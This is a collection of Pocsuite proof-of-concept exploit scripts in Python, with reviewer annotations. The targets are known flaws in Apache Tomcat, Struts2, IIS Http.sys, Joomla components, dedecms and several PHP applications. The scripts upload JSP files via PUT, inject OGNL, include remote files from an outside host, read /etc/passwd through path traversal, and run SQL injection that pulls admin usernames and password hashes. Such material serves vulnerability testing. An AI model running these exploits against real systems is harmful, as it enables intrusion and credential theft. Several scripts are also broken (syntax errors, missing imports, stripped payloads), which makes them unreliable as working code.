        if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()

    def parse_attack(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output
54 |
55 | register(TestPOC)
56 |
--------------------------------------------------------------------------------
/_180323_180219_Tomcat_7_PUT_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Author : jeffzhang
4 | # @Time : 2018/01/10
5 | # @File : _180219_Tomcat_7_PUT_RCE.py.py
6 | # @Desc : ""
7 |
8 |
9 | from pocsuite.api.request import req
10 | from pocsuite.api.poc import register
11 | from pocsuite.api.poc import Output, POCBase
12 | import random
13 | import time
14 |
15 |
class TestPOC(POCBase):
    """pocsuite PoC for CVE-2017-12615: JSP upload via HTTP PUT on Apache Tomcat 7.0.0 - 7.0.79."""
    # PoC metadata read by the pocsuite framework.
    name = "Tomcat Remote Code Execution"
    vulID = ''
    author = 'jeffzhang'
    vulType = 'code execution'
    version = '1.0'
    references = ''
    desc = '''Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability'''
    vulDate = '2017-9-19'
    createDate = '2017-9-19'
    updateDate = '2017-9-20'
    appName = 'Apache Tomcat'
    appVersion = '7.0.0 - 7.0.79'
    appPowerLink = ''
    samples = []

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()

    def _verify(self):
        """PUT a JSP that prints a+b for two random ints, GET it back and look for the sum."""
        result = {}
        a = random.randint(100000, 900000)
        b = random.randint(100000, 900000)
        # Marker JSP: the sum only appears in the response if the page was compiled and executed.
        body = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%out.println({0}+{1});%>""" .format(str(a), str(b))
        url = self.url
        # Pre-check: does OPTIONS on an arbitrary path advertise PUT in the Allow header?
        # NOTE(review): find() returns 0 when "PUT" is the first token, which `> 0` treats as absent.
        resp = req.options(url+'/asda',timeout=10)
        if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
            # Upload path is <epoch>.jsp with a trailing "/"; the GET below strips the slash.
            shell_url = url + "/" + str(int(time.time())) + '.jsp/'
            resp1 = req.put(shell_url, body)
            # Python 2 print statement.
            print resp1.status_code
            resp2 = req.get(shell_url[:-1])
            c = a + b
            # 201 Created plus the computed sum in the fetched page marks success.
            # The uploaded JSP remains on the target; nothing here deletes it.
            if resp1.status_code == 201 and str(c) in resp2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
62 |
63 | register(TestPOC)
64 |
--------------------------------------------------------------------------------
/_160615_Struts2_037_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | # import os
4 | import random
5 | from pocsuite.api.request import req
6 | from pocsuite.api.poc import register
7 | from pocsuite.api.poc import Output, POCBase
8 |
9 |
class TestPOC(POCBase):
    """pocsuite PoC for Struts2 S2-037 (ssvid-91857): OGNL expression evaluation via the request path."""
    # PoC metadata read by the pocsuite framework.
    vulID = '91857'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = ''
    createDate = '2016-06-15'
    updateDate = '2016-06-15'
    references = ['http://www.seebug.org/vuldb/ssvid-91857']
    name = 'Struts2 方法调用远程代码执行漏洞(S2-037)'
    appPowerLink = 'http://struts.apache.org/'
    appName = 'Apache Struts'
    appVersion = ''
    vulType = 'Code Execution'
    desc = '''
'''
    samples = ['']
    install_requires = ['']

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()

    def _verify(self):
        """Send an OGNL expression that prints two random numbers and check whether the echo comes back."""
        result = {}
        # payload = "http://172.16.176.226:8080/struts2-rest-showcase/orders/3"
        rand_num1 = random.randint(300, 3000)
        rand_num2 = random.randint(600, 6000)
        # Expected marker: the two numbers joined as strings (the expression adds the two
        # request parameters, which arrive as strings).
        result_str = str(rand_num1) + str(rand_num2)
        # URL-encoded OGNL placed in the path; t1/t2 carry the random values as query parameters.
        payload = "/%28%23yautc5yautc%3D%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3F"
        payload += "@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29.print%28"
        payload += "%23parameters.t1[0]%2B%23parameters.t2[0]%29%3Aindex.xhtml?t1={}&t2={}".format(
            rand_num1, rand_num2)

        payload_url = self.url + payload
        response = req.get(payload_url)
        if result_str in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
            # Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
59 |
60 |
61 | register(TestPOC)
62 |
--------------------------------------------------------------------------------
/FlashChat _= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-63921: remote file include via dir[inc] in FlashChat aedating4CMS.php."""
    # PoC metadata read by the pocsuite framework.
    vulID = '63921'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2006-09-06'
    createDate = '2015-11-16'
    updateDate = '2015-11-16'
    references = ['http://www.sebug.net/vuldb/ssvid-63921']
    name = 'FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability'
    appPowerLink = 'N/A'
    appName = 'FlashChat'
    appVersion = '<=4.5.7'
    vulType = 'Other'
    desc = '''
FlashChat在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞以Web进程权限执行任意命令。
FlashChat的/inc/cmses/aedating4CMS.php、/inc/cmses/aedatingCMS.php和/inc/cmses/aedatingCMS2.php脚本
没有正确验证dir[inc]变量用户输入,远程攻击者通过包含本地或外部资源的任意文件导致执行任意脚本代码。
'''
    samples = ['']

    def _attack(self):
        """Request aedating4CMS.php with dir[inc] pointing at an external verification file."""
        result = {}

        # The remote file content is (comment left unfinished by the author)
        # External dependency: the check only works while this third-party URL is reachable.
        payload='http://tool.scanv.com/wsl/php_verify.txt?'
        # Vulnerability test URL
        expUrl='{url}/inc/cmses/aedating4CMS.php?dir[inc]={py}'.format(url=self.url,py=payload)
        try:
            # NOTE(review): self.headers is not defined in this file; presumably provided by POCBase — confirm.
            response=req.get(expUrl, headers=self.headers, timeout=50)
            # NOTE(review): `re` is never imported in this file, so this raises NameError, which the
            # bare except below swallows; as written the PoC always reports "nothing returned".
            match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response.content)
            if match:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = expUrl
            else:
                result={}
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit.
            result={}
        return self.parse_output(result)

    def _verify(self):
        """Template stub: returns an empty (failed) result without sending anything."""
        result = {}
        #Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
61 |
62 |
63 | register(TestPOC)
--------------------------------------------------------------------------------
/Max's Image Uploader Shell Upload Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import urlparse
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-67514: unrestricted upload in PHP F1 Max's Image Uploader 1.0."""
    # PoC metadata read by the pocsuite framework.
    vulID = '67514'  # ssvid
    version = '1.0'
    author = ['hfloveyy']
    vulDate = '2010-01-26'
    createDate = '2015-12-08'
    updateDate = '2015-12-08'
    references = ['http://www.sebug.net/vuldb/ssvid-67514']
    # NOTE(review): the unescaped apostrophe in "Max's" ends the single-quoted literal early and is a
    # SyntaxError as shown (same on appName below); presumably "\'" in the original source.
    name = 'Max's Image Uploader Shell Upload Vulnerability'
    appPowerLink = 'http://www.phpf1.com'
    appName = 'PHP F1 Max's Image Uploader'
    appVersion = '1.0'
    vulType = 'File upload vulnerability'
    desc = '''
PHP F1 Max's Image Uploader 1.0版本的maxImageUpload/index.php中存在无限制文件上传漏洞。
当Apache未被设置来处理具有pjpeg或jpeg扩展名的拟态文件时,远程攻击者可以通过上传具有一个pjpeg或jpeg扩展名的文件,执行任意代码,并借助对original/的一个直接请求来访问该文件。
'''
    samples = ['127.0.0.1']

    def _attack(self):
        """Template stub: returns an empty (failed) result without sending anything."""
        result = {}
        #Write your code here

        return self.parse_output(result)

    def _verify(self):
        """Post an empty file named 1.php with an image/jpeg type, then request it under original/."""
        result = {}
        testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
        vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')

        # Multipart tuple: (filename, content, content-type); the uploaded body is empty.
        payload = {'myfile':('1.php','','image/jpeg')}
        data = {'submitBtn':'Upload'}




        # The upload response body is read and discarded.
        req.post(vulurl,files = payload,data = data).content
        resp = req.get(testurl)
        # NOTE(review): the membership test runs against the Response object rather than resp.content,
        # and the uploaded file is empty, so this marker cannot originate from the upload.
        if '5a8adb32edd60e0cfb459cfb38093755' in resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        #Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""


        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
64 |
65 |
66 | register(TestPOC)
--------------------------------------------------------------------------------
/Gizzar _= 03162002 (index.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-64305: remote file include via basePath in Gizzar index.php."""
    # PoC metadata read by the pocsuite framework.
    vulID = '64305'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2006-12-13'
    createDate = '2015-12-19'
    updateDate = '2015-12-19'
    references = ['http://www.sebug.net/vuldb/ssvid-64305']
    name = 'Gizzar <= 03162002 (index.php) Remote File Include Vulnerability'
    appPowerLink = 'N/A'
    appName = 'Gizzar'
    appVersion = '03162002'
    vulType = 'Remote File Include'
    desc = '''
Gizzar 03162002及早期版本的index.php脚本存在PHP远程文件包含漏洞,
远程攻击者可以借助basePath参数中的URL执行任意PHP代码。
'''
    samples = ['']

    def _attack(self):
        """Attack mode is not implemented: returns an empty (failed) result."""
        result = {}
        return self.parse_output(result)

    def _verify(self):
        """Request index.php with basePath pointing at an external verification file and look for its marker."""
        # Verify the RFI through index.php
        result = {}
        # External dependency: the check only works while this third-party URL is reachable.
        payload='http://tool.scanv.com/wsl/php_verify.txt?'
        # URL used for the test
        vulurl='{url}/index.php?basePath={evil}'.format(url=self.url,evil=payload)
        # Forged HTTP headers (Host is set to an unrelated value rather than the target's)
        httphead = {
            'Host':'www.google.com',
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        # Send the test request
        resp=req.get(vulurl,headers=httphead,timeout=50)
        #md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
        match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
        # A match on md5('3.1416') means the remote file was included and executed
        if match:
            # Return the test information
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
64 |
65 |
66 | register(TestPOC)
--------------------------------------------------------------------------------
/Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
class TestPOC(POCBase):
    """pocsuite PoC for SSV-82196: reflected XSS via this_year in Grayscale BandSite CMS footer.php."""
    # PoC metadata read by the pocsuite framework.
    vulID = 'SSV-82196'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2006-9-21'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['http://www.securityfocus.com/bid/20137']
    name = 'Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS'
    appPowerLink = 'http://sourceforge.net/projects/bandsitecms/'
    appName = 'Grayscale BandSite CMS'
    appVersion = '1.1.0'
    vulType = 'XSS'
    desc = '''
Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize
user-supplied input data.These issues may allow an attacker to access sensitive information, execute arbitrary
server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of
an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based
authentication credentials; other attacks are possible.Version 1.1.0 is vulnerable; other versions may also be affected.
'''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        """Request footer.php with the this_year parameter and hand the response to parse_verify."""
        # NOTE(review): the parameter value is empty as shown while parse_verify looks for
        # ">alert(/Dirorder/)<" in the body; the markup part of this literal was presumably
        # stripped during extraction — confirm against the original.
        payload = "/includes/footer.php?this_year="
        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload, 'xss')

    def parse_verify(self, res, payload, type):
        """Build the Output from *res*; only type == 'xss' is handled (`type` shadows the builtin)."""
        output = Output(self)
        result = {}
        # Success = the reflected marker appears unescaped in the response body.
        if type == 'xss' and '>alert(/Dirorder/)<' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_jequoteform - Local File Inclusion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-68611: path traversal via the view parameter of Joomla com_jequoteform."""
    # PoC metadata read by the pocsuite framework.
    vulID = '68611'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-06-01'
    createDate = '2015-12-08'
    updateDate = '2015-12-08'
    references = ['http://www.sebug.net/vuldb/ssvid-68611']
    name = 'Joomla Component com_jequoteform - Local File Inclusion'
    appPowerLink = 'www.joomla.org'
    appName = 'Joomla Component com_jequoteform'
    appVersion = 'N/A'
    vulType = 'Local File Inclusion'
    desc = '''
Joomla!的JE Quotation Form (com_jequoteform)组件存在目录遍历漏洞。
远程攻击者可以借助脚本index.php中的view参数中的".."符读取任意的文件,也可能导致其他未明影响。
'''
    samples = ['']

    def _attack(self):
        """Attack mode is not implemented: returns an empty (failed) result."""
        result = {}
        return self.parse_output(result)

    def _verify(self):
        """Request /etc/passwd through the view parameter and check the body for a passwd-style root line."""
        # Verify the flaw by reading /etc/passwd as the example file
        result = {}
        filename='/etc/passwd'
        url='/index.php'
        exploit='?option=com_jequoteform&view='
        # Six directory levels up, followed by a percent-encoded NUL terminator.
        dBs='../'*5+'..'
        ends='%00'
        # URL under test
        vulurl=self.url+url+exploit+dBs+filename+ends
        # Forged HTTP headers (Host is set to an unrelated value rather than the target's)
        httphead = {
            'Host':'www.google.com',
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        resp=req.get(vulurl,headers=httphead,timeout=50)
        # re.match anchors at the start, so the body must begin with the root entry.
        if resp.status_code==200 and re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            # The whole response body is stored in the report.
            result['Fileinfo']={}
            result['Fileinfo']['Filename']=filename
            result['Fileinfo']['Content']=resp.content
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
65 |
66 |
67 | register(TestPOC)
--------------------------------------------------------------------------------
/IIS 系列 Http.sys 处理 Range 整数溢出漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import socket
5 | import random
6 | from urlparse import urljoin
7 | from pocsuite.net import req
8 | from pocsuite.poc import POCBase, Output
9 | from pocsuite.utils import register
10 | from lib.utils.funs import url2ip
11 |
12 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-89233 (MS15-034 / CVE-2015-1635): Http.sys Range header check over raw TCP."""
    # PoC metadata read by the pocsuite framework.
    vulID = '89233'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-04-14'
    createDate = '2015-04-16'
    updateDate = '2015-09-19'
    references = ['http://www.sebug.net/vuldb/ssvid-89233']
    name = 'IIS 系列 Http.sys 处理 Range 整数溢出漏洞'
    appPowerLink = 'http://www.iis.net/'
    appName = 'Miscrosoft IIS httpd'
    appVersion = 'N/A'
    vulType = 'Buffer Overflow'
    desc = '''
2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。
'''

    def _verify(self):
        """Two raw HTTP requests to port 80: a server banner check, then the Range probe."""

        # url2ip comes from the project's lib.utils.funs; resolves self.url to an address.
        ip = url2ip(self.url)
        # 2**64 - 1 as a decimal string: the oversized Range end used by the MS15-034 check.
        hexAllFfff = "18446744073709551615"
        flag = False
        # NOTE(review): "GET /HTTP/1.0" has no space between path and version as shown — possibly lost in extraction; confirm.
        req1 = "GET /HTTP/1.0\r\n\r\n"
        # NOTE(review): this local `req` shadows the `req` module imported at the top of the file.
        req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

        # No socket timeout is set; connect()/recv() may block indefinitely. Port 80 is hard-coded.
        client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ip, 80))
        client_socket.send(req1)
        boringResp = client_socket.recv(1024)

        # Only continue when the first reply identifies a Microsoft server.
        if "Microsoft" in boringResp:
            client_socket.close()
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((ip,80))
            client_socket.send(req)
            goodResp = client_socket.recv(1024)

            # NOTE(review): the literal lacks the space in "Range Not" as shown; confirm against the original.
            if "Requested RangeNot Satisfiable" in goodResp:
                flag = True
        # The socket left open at this point is never closed before returning.

        return self.parse_verify(flag)

    def parse_verify(self, flag):
        """Build the Output from the boolean probe result."""
        output = Output(self)
        result = {}

        if flag:
            result['VerifyInfo'] = {}
            # NOTE(review): `res` is not defined anywhere in this file; this line raises NameError on the success path.
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('No vulnerability found.')

        return output

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()
72 |
73 | register(TestPOC)
74 |
--------------------------------------------------------------------------------
/joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC: reflected XSS via the q parameter of the Joomla GoogleSearch (CSE) 3.0.2 component."""
    # PoC metadata read by the pocsuite framework.
    vulID = '1'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2015-08-29'
    createDate = '2016-01-15'
    updateDate = '2016-01-15'
    references = ['http://www.sebug.net/vuldb/ssvid-']
    name = 'joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞'
    appPowerLink = 'http://www.kksou.com'
    appName = 'joomla!'
    appVersion = '3.0.2'
    vulType = 'XSS漏洞'
    desc = '''
joomla! 组件GoogleSearch (CSE)的3.0.2版本的参数q由于过滤不严,导致存在反射型XSS漏洞。
远程攻击者可以利用该漏洞执行html代码。该漏洞验证的POC如下所示:
http://XXX/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q=">
验证的截图如下:http://pan.baidu.com/s/1i4tiZE9
'''
    samples = ['http://ufoforce.com']

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()

    def _verify(self):
        """Send the marker through the q parameter and check whether it is reflected verbatim."""
        # Verify the XSS
        result = {}
        # Marker string
        pars='<0x!!qaz_*'
        # Verification payload
        # NOTE(review): this literal is split across two lines as shown (a SyntaxError), and it does not
        # contain `pars`; the markup carrying the marker was presumably stripped during extraction.
        payload='">
'
        # Vulnerable path
        exploit='/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q='
        # Build the request URL
        vulurl=self.url+exploit+payload
        # Custom HTTP headers
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        # Request
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        # Check: the marker must come back unescaped
        if pars in resp.content:
            # Verified
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
67 |
68 |
69 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_recommend.php_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
class Fuckdede(POCBase):
    """pocsuite PoC: SQL injection through _FILES[type][tmp_name] in dedecms 5.7 plus/recommend.php."""
    # PoC metadata read by the pocsuite framework.
    vulID='3'
    version = '1'
    author = ['fengxuan']
    vulDate = '2016-2-20'
    createDate = '2016-2-20'
    updateDate = '2016-2-20'
    references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
    name = 'dedecms plus/recommend.php 注入漏洞利用EXP'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'SQL Injection'
    desc = '''
开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
此注入为报错注入,可以通过UpdateXML函数进行注入。
'''
    samples = ['']

    def _verify(self):
        """Issue the injection request and report success if the '|'-delimited marker is in the body."""
        result = {}
        # No "/" is inserted between self.url and the path, so self.url is assumed to end with one.
        target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
        response = req.get(target)
        content = response.content
        # NOTE(review): this pattern literal is split across two lines as shown (a SyntaxError);
        # the original presumably ended the pattern on one line — confirm.
        regex = re.compile('.*?\|(.*?)
')
        data = regex.search(content)
        if data != None:
            result = {'VerifyInfo':{}}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_result(result)

    def _attack(self):
        """Same request as _verify, but the captured group is also stored in the report."""
        result = {}
        target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
        response = req.get(target)
        content = response.content
        # NOTE(review): same split literal as in _verify.
        regex = re.compile('.*?\|(.*?)
')
        data = regex.search(content)
        if data != None:
            string = data.groups()
            result = {'VerifyInfo':{}}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['data'] = string
        return self.parse_result(result)

    def parse_result(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail("Internet Nothing returned")
        return output
63 |
64 | register(Fuckdede)
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/BookingeCMS HotelCMS酒店预订管理系统key和m=info.detail id存在注入.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
class TestPOC(POCBase):
    """pocsuite PoC (metadata left blank): error-based SQL injection in BookingeCMS/HotelCMS id and key parameters."""
    # PoC metadata read by the pocsuite framework; every field is still at its template default.
    vulID = ''  # ssvid
    version = '1.0'
    author = ['kenan']
    vulDate = ''
    createDate = '2016-06-06'
    updateDate = '2016-06-06'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = ''
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
'''
    samples = ['']
    install_requires = ['']
    # Please avoid third-party libraries where possible; when one is required, fill in this field as described at
    # https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明

    def _attack(self):
        """Try the id parameter (GET) and then the key parameter (POST); report the first that echoes the ~~~ marker."""
        result = {}
        #Write your code here
        vulurl = "%s" % self.url
        payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
        resp = req.get(vulurl+ payload)
        # Anything between "~~~" delimiters (0x7e7e7e) in the error page is the extracted value.
        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
        vulurl1 = "%s/?m=city.getSearch&index=xx" % self.url
        payload1 = {"key":"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"}
        # The POST goes to `vulurl` (the base URL); `vulurl1` is only used in the report below.
        resp1 = req.post(vulurl,data =payload1)
        re_result1 = re.findall(r'~~~(.*?)~~~', resp1.content, re.S|re.I)
        if re_result :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
            return self.parse_output(result)
        if re_result1 :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl1
            result['VerifyInfo']['Payload'] = payload1
            return self.parse_output(result)
        # Falls off the end with an implicit None when neither check matched.

    def _verify(self):
        """Verification delegates to _attack; the local `result` is unused."""
        result = {}
        return self._attack()

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
62 |
63 |
64 | register(TestPOC)
--------------------------------------------------------------------------------
/EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-85903: unauthenticated XXE file read via /api/login on EMC Cloud Tiering Appliance 10.0."""
    # PoC metadata read by the pocsuite framework.
    vulID = '85903'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2014-04-16'
    createDate = '2015-11-12'
    updateDate = '2015-11-12'
    references = ['http://www.sebug.net/vuldb/ssvid-85903']
    name = 'EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read'
    appPowerLink = 'N/A'
